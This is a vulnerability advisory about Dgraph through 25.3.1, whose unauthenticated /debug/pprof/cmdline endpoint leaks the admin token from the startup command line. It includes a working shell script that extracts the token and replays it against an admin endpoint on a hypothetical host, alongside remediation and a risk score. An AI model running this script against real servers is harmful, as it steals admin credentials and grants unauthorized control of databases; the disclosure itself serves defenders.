Dgraph Unauthenticated Credential Disclosure Vulnerability in Debug Endpoint Allowing Unauthorized Admin Access

Vulnerability

Dgraph, an open-source distributed GraphQL database, serves the Go pprof debug endpoint /debug/pprof/cmdline on the Alpha HTTP port without any authentication in versions through 25.3.1. That endpoint returns the full command line of the running process, which includes the admin token whenever Alpha was started with the --security 'token=...' flag. An attacker who can reach the port reads the token, supplies it in the X-Dgraph-AuthToken header, and is accepted by the token check in adminAuthHandler, gaining access to admin-only endpoints such as /admin/config/cache_mb. The check itself is not bypassed; it is satisfied with a credential the attacker was never meant to hold, which is why the result is full privileged administrative access rather than a partial one. Every deployment in which the Alpha HTTP port is reachable by untrusted parties is affected.

Impact

Exploitation leads to unauthorized privileged administrative access to Dgraph Alpha: an attacker holding the leaked token can read and change runtime configuration and control operational functions through the admin endpoints, exactly as a legitimate administrator would.

Reproduction

To reproduce, start Dgraph Alpha with an admin token set through the --security startup flag, with the Alpha HTTP port reachable from the attacker's position and /debug/pprof/cmdline served without authentication. First confirm the control case: a request to an admin endpoint such as /admin/config/cache_mb without an X-Dgraph-AuthToken header is refused. Then fetch /debug/pprof/cmdline with no credentials, take the token= value from the --security argument in the returned command line, and repeat the admin request with X-Dgraph-AuthToken set to that value; it is now accepted.
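The extraction step in that procedure, as an added example that is not part of the advisory or of Dgraph's own tooling. It assumes the /debug/pprof/cmdline response format of Go's net/http/pprof (the process arguments joined by NUL bytes, no trailing separator) and Dgraph's superflag syntax for --security (semicolon-separated key=value pairs), and parses a constructed sample offline; the host alpha.example.internal in probe_live is hypothetical, and 8080 is Alpha's default HTTP port.

```shell
#!/bin/sh
# Added example (not Dgraph project code): recover the admin token from an
# unauthenticated /debug/pprof/cmdline response and reuse it against an admin
# endpoint. The offline parts run against a constructed sample; probe_live is
# only invoked by hand against a reachable Alpha.

# Constructed sample of what /debug/pprof/cmdline returns for an Alpha started as
#   dgraph alpha --security 'token=s3cr3t-admin-token; whitelist=10.0.0.0/8' --my=alpha:7080
# Go's pprof handler writes os.Args joined by NUL bytes, so the sample does the same.
make_sample() {
  printf 'dgraph\0alpha\0--security\0token=s3cr3t-admin-token; whitelist=10.0.0.0/8\0--my=alpha:7080' > "$1"
}

# Print the token= value from the --security argument found in a saved cmdline
# dump. Handles "--security <value>" and "--security=<value>"; the value itself is
# a Dgraph superflag, i.e. ';'-separated key=value pairs. Exit status 1 if no
# token is present, so callers can distinguish "leaked" from "not configured".
extract_token() {
  tr '\000' '\n' < "$1" | awk '
    prev == "--security" { sec = $0; exit }          # flag and value as two args
    /^--security=/       { sec = substr($0, 12); exit } # flag=value as one arg
    { prev = $0 }
    END {
      if (sec == "") exit 1
      n = split(sec, pairs, ";")
      for (i = 1; i <= n; i++) {
        p = pairs[i]
        gsub(/^[ \t]+|[ \t]+$/, "", p)               # trim around each pair
        if (p ~ /^token=/) { print substr(p, 7); exit 0 }
      }
      exit 1
    }'
}

# Live check against a reachable Alpha (hypothetical host; not run by this script).
# Shows the control case without the header, then the same request with the
# leaked token, so the two HTTP status codes can be compared side by side.
probe_live() {
  ALPHA="${1:-http://alpha.example.internal:8080}"
  dump=$(mktemp)
  curl -sf "$ALPHA/debug/pprof/cmdline" -o "$dump" || { rm -f "$dump"; return 1; }
  token=$(extract_token "$dump") || { rm -f "$dump"; echo "no token in cmdline"; return 1; }
  rm -f "$dump"
  curl -s -o /dev/null -w 'without token: HTTP %{http_code}\n' "$ALPHA/admin/config/cache_mb"
  curl -s -o /dev/null -w 'with leaked token: HTTP %{http_code}\n' \
       -H "X-Dgraph-AuthToken: $token" "$ALPHA/admin/config/cache_mb"
}

# Offline demonstration on the constructed sample.
sample=$(mktemp)
make_sample "$sample"
echo "leaked token: $(extract_token "$sample")"
rm -f "$sample"
```

After upgrading to the fixed release, the same probe_live run from an unauthenticated client is a cheap regression check: extract_token should no longer obtain a token from the cmdline response, and the admin request should stay refused.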

Remediation

Users should upgrade to Dgraph version 25.3.2, where this vulnerability has been fixed. Because the exposure requires nothing more than reachability of the Alpha HTTP port, keep that port off untrusted networks until the upgrade is complete, and treat any admin token that was configured on a reachable instance as compromised and rotate it after upgrading.

Added: Apr 15, 2026, 10:10 PM
Updated: Apr 15, 2026, 10:10 PM

Vulnerability Rating

Custom Algorithm
spread          2.6
impact          5.0
exploitability  9.1
remediation     7.7
relevance       6.0
threat          6.4
urgency         2.9
incentive       8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.